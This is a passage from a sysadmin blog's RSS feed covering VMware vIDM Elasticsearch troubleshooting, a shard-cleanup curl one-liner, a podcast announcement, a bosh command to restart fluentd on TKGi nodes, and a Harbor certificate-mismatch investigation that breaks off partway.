<p>&nbsp;</p>
<p>Something called 'com.vmware.idm.elasticsearch.plugin' makes an appearance and starts, somehow,  messing with the node count that Elasticsearch itself maintains for its cluster.</p>
<p>&nbsp;</p>
<p>This VMware KB kind of explains what might be going on here https://kb.vmware.com/s/article/74709 , though it references a similar, but different error, actually a timing situation involving a cluster consisting of more than 1 node.</p>
<p>&nbsp;</p>
<p>The point though, is this:</p>
<p>&nbsp;</p>
<p>'com.vmware.idm.elasticsearch.plugin' is a</p>
<p>&nbsp;</p>
<p><em>plugin for elasticsearch that asks IDM for the list of nodes that are expected to be in the cluster. It uses that list to determine how many nodes it should be able to see before a primary can be elected and the cluster formed. </em></p>
<p>&nbsp;</p>
<p>Seems logical, Elasticsearch cant know by itself what kind if cluster topology you build with vIDM, but vIDM knows.</p>
<p>&nbsp;</p>
<p>Based on the log, what seemed to be happening is that Elastic starts normally, it loads in its config from</p>
<p>&nbsp;</p>
<pre>/opt/vmware/elasticsearch/config/elasticsearch.yml

</pre>
<p>This config includes how many cluster nodes are expected (in my case, just 1, cause there is no cluster).</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone wp-image-1667" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?resize=434%2C186&#038;ssl=1" alt="" width="434" height="186" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?w=880&amp;ssl=1 880w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?resize=300%2C129&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?resize=768%2C330&amp;ssl=1 768w" sizes="auto, (max-width: 434px) 100vw, 434px" /></a></p>
<p>&nbsp;</p>
<p>But then, for some reason, the idm plugin tries to update the running cluster count <em>again</em> and here something goes wrong. The elastic cluster service, ends up removing its only node, and then of course, Elastic service dies. The next message is that the cluster service can no longer connect.</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1668" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=640%2C64&#038;ssl=1" alt="" width="640" height="64" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=300%2C30&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=1024%2C102&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=768%2C77&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=1536%2C154&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=2048%2C205&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>&nbsp;</p>
<p>I have no idea why this is happening. And it was pretty consistent. Every time I restarted the Elastic Service or rebooted the VM. The config for the IDM plugin is also contained in /opt/vmware/elasticsearch/config/elasticsearch.yml , but it doesn't keep its own nodecount value, so I am not sure why it thinks it can safely tell the cluster service to remove the only node for whatever reason.</p>
<p>&nbsp;</p>
<p>Anyway, the workaround here, is pretty straightforward; simply disable the IDM plugin by setting the 'discovery.zen.idm.enabled' value to false. ( in /opt/vmware/elasticsearch/config/elasticsearch.yml )</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1669" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?resize=640%2C275&#038;ssl=1" alt="" width="640" height="275" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?w=1327&amp;ssl=1 1327w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?resize=300%2C129&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?resize=1024%2C440&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?resize=768%2C330&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Obviously this is unsupported, so do this at your own risk. If you ever expand the vIDM installation into a cluster, that will obviously break now, so you will have to turn this back on again. At that point, perhaps best to raise a VMware support ticket around this.</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1670" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?resize=640%2C440&#038;ssl=1" alt="" width="640" height="440" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?w=1175&amp;ssl=1 1175w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?resize=300%2C206&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?resize=1024%2C704&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?resize=768%2C528&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<h2>Bonus: Cleaning up unassigned shards</h2>
<p>&nbsp;</p>
<p>If you health stays yellow due to a number of 'unassigned shards' hanging around forever, you can force-delete them with the following one-liner:</p>
<p>&nbsp;</p>
<pre>curl -XGET http://localhost:9200/_cat/shards | grep UNASSIGNED | awk {'print $1'} | xargs -i curl -XDELETE "http://localhost:9200/{}"</pre>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1663</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg</image><post-id xmlns="com-wordpress:feed-additions:1">1663</post-id>	</item>
		<item>
		<title>Guest on the VMware Community Podcast &#8211; and my upcoming Tanzu VMware{code} session</title>
		<link>https://thefluffyadmin.net/?p=1658</link>
					<comments>https://thefluffyadmin.net/?p=1658#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Thu, 25 Mar 2021 12:02:19 +0000</pubDate>
				<category><![CDATA[Career, Training and Personal Development]]></category>
		<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Podcasts]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[Podcast]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[vBarbecue]]></category>
		<category><![CDATA[VMTN]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1658</guid>

					<description><![CDATA[Robert Kloosterhuis; https://thefluffyadmin.net/ , 25march2021 Had an excellent time on the #vmware #vcommunity podcast with last night.  Full recording here: My upcoming VMware{code} session on Tanzu for Beginners, for the 9th of April,  is here: https://blogs.vmware.com/code/2021/03/09/vmware-code-april-2021-power-sessions/… #tanzu #itqlife]]></description>
										<content:encoded><![CDATA[<p><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0">Robert Kloosterhuis; https://thefluffyadmin.net/ , 25march2021</p>
<p>Had an excellent time on the </span><span class="r-18u37iz"><a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0" dir="ltr" role="link" href="https://twitter.com/hashtag/vmware?src=hashtag_click" data-focusable="true">#vmware</a></span> <span class="r-18u37iz"><a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0" dir="ltr" role="link" href="https://twitter.com/hashtag/vcommunity?src=hashtag_click" data-focusable="true">#vcommunity</a></span><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0"> podcast with last night. </span></p>
<div class="css-1dbjc4n r-xoduu5"><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0">Full recording here:</span></div>
<p><iframe loading="lazy" title="YouTube video player" src="https://www.youtube.com/embed/dFgbRGDyNdI" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></p>
<div></div>
<div class="css-1dbjc4n r-xoduu5"><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0">My upcoming VMware{code} session on Tanzu for Beginners, for the 9th of April,  is here: </span><a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0" dir="ltr" role="link" href="https://t.co/dfHk1X5v0o?amp=1" target="_blank" rel="noopener noreferrer" data-focusable="true"><span class="css-901oao css-16my406 r-poiln3 r-hiw28u r-bcqeeo r-qvutc0" aria-hidden="true">https://</span>blogs.vmware.com/code/2021/03/0<span class="css-901oao css-16my406 r-poiln3 r-hiw28u r-bcqeeo r-qvutc0" aria-hidden="true">9/vmware-code-april-2021-power-sessions/</span><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-lrvibr r-qvutc0" aria-hidden="true">…</span></a></div>
<div></div>
<div class="css-1dbjc4n r-xoduu5"><span class="r-18u37iz"><a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0" dir="ltr" role="link" href="https://twitter.com/hashtag/tanzu?src=hashtag_click" data-focusable="true">#tanzu</a></span> <span class="r-18u37iz"><a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0" dir="ltr" role="link" href="https://twitter.com/hashtag/itqlife?src=hashtag_click" data-focusable="true">#itqlife</a></span></div>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1658</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/03/Screenshot-2021-03-25-130103.png</image><post-id xmlns="com-wordpress:feed-additions:1">1658</post-id>	</item>
		<item>
		<title>Useful Bosh Oneliner to restart something on a bunch of TKGi nodes.</title>
		<link>https://thefluffyadmin.net/?p=1654</link>
					<comments>https://thefluffyadmin.net/?p=1654#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Tue, 02 Mar 2021 17:56:48 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[bosh]]></category>
		<category><![CDATA[pks]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[tkgi]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1654</guid>

					<description><![CDATA[Robert Kloosterhuis, 2 march 2021 Found myself is a situation where I had to restart fluentd on every VM in a 130-node (!) TKGi(PKS) Kubernetes cluster. Fluentd is managed through Monit, and you can run a command through the Bosh ssh command. In this case: sudo monit restart fluentd So one of the customer admins <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1654">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>Robert Kloosterhuis, 2 march 2021</p>
<p>Found myself is a situation where I had to restart fluentd on every VM in a 130-node (!) TKGi(PKS) Kubernetes cluster.</p>
<p>Fluentd is managed through Monit, and you can run a command through the Bosh ssh command. In this case: sudo monit restart fluentd</p>
<p>So one of the customer admins that is <em>way</em> more fluent in bash that me, made this.</p>
<pre>bosh -e &lt;your bosh env&gt; -d service-instance_e30c8cc7-ada0-4e70-9e72-455682749aaa vms | \
awk '{print "bosh -e &lt;your bosh env&gt; -d service-instance_e30c8cc7-ada0-4e70-9e72-455682749aaa ssh "$1" -c \"sudo monit restart fluentd\""}' \
&gt; start-fluentd.sh</pre>
<p>And then simply check and run start-fluentd.sh</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1654</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1654</post-id>	</item>
		<item>
		<title>Troubleshooting Certificate mismatch in Harbor in TKGi</title>
		<link>https://thefluffyadmin.net/?p=1615</link>
					<comments>https://thefluffyadmin.net/?p=1615#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Wed, 24 Feb 2021 10:21:49 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[certificate]]></category>
		<category><![CDATA[harbor]]></category>
		<category><![CDATA[monit]]></category>
		<category><![CDATA[opsman]]></category>
		<category><![CDATA[pks]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[tkgi]]></category>
		<category><![CDATA[vmware]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1615</guid>

					<description><![CDATA[I recently deployed harbor for a customer. This is the version of Harbor that has been pre-packaged into a 'Tile' , for use in Tanzu Kubernetes Grid Integrated edition [TKGi] (formerly known as Pivotal Container Services [PKS]. The tool that will deploy Harbor, in this case, is the Ops Manager, and it gives you a <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1615">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>I recently deployed harbor for a customer. This is the version of Harbor that has been <a href="https://network.pivotal.io/products/harbor-container-registry/">pre-packaged into a 'Tile'</a> , for use in Tanzu Kubernetes Grid Integrated edition [TKGi] (formerly known as Pivotal Container Services [PKS].</p>
<p>The tool that will deploy Harbor, in this case, is the Ops Manager, and it gives you a nice interface where you can set up all the essential settings for Harbor.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1624" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=640%2C232&#038;ssl=1" alt="" width="640" height="232" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?w=1909&amp;ssl=1 1909w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=300%2C109&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=1024%2C372&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=768%2C279&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=1536%2C558&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>One of the things you can set, is the certificate to be used by Harbor.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1625" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=640%2C390&#038;ssl=1" alt="" width="640" height="390" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?w=2145&amp;ssl=1 2145w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=300%2C183&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=1024%2C624&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=768%2C468&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=1536%2C937&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=2048%2C1249&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a> </p>
<p>In this case, we had the customer generate a certificate for us, for Harbor. The bottom field is meant for the certificate of the Certificate Authority, that generated the Harbor certificate.</p>
<p>I  made a simple mistake here. Previously, the customer had generated Certificates from their root CA. However, this time, they had set up an intermediate, issuing CA. I did not know this, and had <em>assumed</em> the certificate chain was the same as previously. So I pasted the <em>wrong</em> certificate into this field. The Root-CA, instead of the issuing, intermediate CA. <a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1626" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?resize=533%2C148&#038;ssl=1" alt="" width="533" height="148" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?w=1128&amp;ssl=1 1128w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?resize=300%2C83&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?resize=1024%2C284&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?resize=768%2C213&amp;ssl=1 768w" sizes="auto, (max-width: 533px) 100vw, 533px" /></a></p>
<p>When I tried to deploy Harbor using Opsman, the deployment failed. <em>"Error: 'harbor-app/4d891315-d61e-4891-8512-486b7f93e5a2 (0)' is not running after update. Review logs for failed jobs: harbor"</em></p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1627" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=640%2C171&#038;ssl=1" alt="" width="640" height="171" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?w=1693&amp;ssl=1 1693w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=300%2C80&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=1024%2C273&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=768%2C205&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=1536%2C410&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p><em>How</em> it failed is interesting, and that is what this post is mostly about.</p>
<p>Opsman uses the BOSH, under the covers, to create and manage the VM's, and their content, for any product it deploys.</p>
<p>It uses the <a href="https://bosh.io/docs/vm-monit/">Monit tool</a>, to monitor the health of its VMs, and the result of Monit is also used to determine, whether a deployment was successfully completed or not. <br /><br />In fact it is left to Monit to start, and stop, the various processes on a BOSH-managed VM. So Monit will contain a config for specific processes, to start, stop, and monitor their health. This can be as simple as monitoring a process ID, or can be custom scripts.  In the case of Harbor, its some custom scripts that I will detail below.</p>
<p>In order to further troubleshoot this issue, we had to dig a bit deeper into the logs. There are 2 ways to do this; you can download a log-bundle using the Opsman UI</p>
<p>&nbsp;</p>
<p>Or you can SSH into the VM, using the BOSH commandline tool, and view the logs live in the /var/vcap/sys/log directory.</p>
<p>Examining the log structure, there are some things to note.</p>
<p>First of all, because this is a BOSH deployment of Harbor, there are various folders that refer to BOSH-specific items. <br />Harbor itself, runs as a set of Docker containers. So there you will also find a split between logs coming from Docker, or in this case, the results of Docker-Compose, and the Harbor app components itself.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1436.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1630" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1436.jpg?resize=356%2C214&#038;ssl=1" alt="" width="356" height="214" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1436.jpg?w=356&amp;ssl=1 356w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1436.jpg?resize=300%2C180&amp;ssl=1 300w" sizes="auto, (max-width: 356px) 100vw, 356px" /></a></p>
<p>If you look in the Harbor folder, we find the various logs that relate to starting and stopping of Harbor, and then a further folder, that contains the Harbor app-component logs (1 per container).</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1437.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1631" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1437.jpg?resize=335%2C284&#038;ssl=1" alt="" width="335" height="284" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1437.jpg?w=335&amp;ssl=1 335w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1437.jpg?resize=300%2C254&amp;ssl=1 300w" sizes="auto, (max-width: 335px) 100vw, 335px" /></a><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1438.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1632" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1438.jpg?resize=257%2C324&#038;ssl=1" alt="" width="257" height="324" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1438.jpg?w=362&amp;ssl=1 362w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1438.jpg?resize=238%2C300&amp;ssl=1 238w" sizes="auto, (max-width: 257px) 100vw, 257px" /></a></p>
<p>Opsman told us, that the Harbor app itself was not starting. And we know its actually using Monit to start, stop and monitor Harbor. And its a set of scripts to do this.</p>
<p>The monit log can be found here: /var/vcap/monit/monit.log</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1635" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?resize=640%2C166&#038;ssl=1" alt="" width="640" height="166" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?w=1121&amp;ssl=1 1121w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?resize=300%2C78&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?resize=1024%2C265&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?resize=768%2C199&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>As I said, Habor consists of a set of running Docker containers. If you wish to view this directly, we can actually use Docker on the VM.</p>
<p>SSH into the VM:</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1633" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=640%2C260&#038;ssl=1" alt="" width="640" height="260" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?w=2113&amp;ssl=1 2113w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=300%2C122&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=1024%2C416&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=768%2C312&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=1536%2C624&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=2048%2C833&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>We need to run as root, and need to make sure the Docker client, can find the local docker daemon running.</p>
<pre>sudo su -<br />alias docker='/var/vcap/packages/docker/bin/docker -H unix:///var/vcap/sys/run/docker/dockerd.sock'</pre>
<p>Now we can simply run a 'Docker ps' and see our containers</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1634" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=640%2C130&#038;ssl=1" alt="" width="640" height="130" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?w=2516&amp;ssl=1 2516w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=300%2C61&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=1024%2C208&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=768%2C156&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=1536%2C311&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=2048%2C415&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Now the cool thing is, you can simply kill all these processes if you want, and Monit will restart them. That can be very useful when testing things.</p>
<p>Lets have a look at the monit configuration for Harbor:</p>
<p>monit -v status</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1640" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=640%2C172&#038;ssl=1" alt="" width="640" height="172" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?w=2316&amp;ssl=1 2316w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=300%2C80&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=1024%2C275&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=768%2C206&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=1536%2C412&amp;ssl=1 1536w, 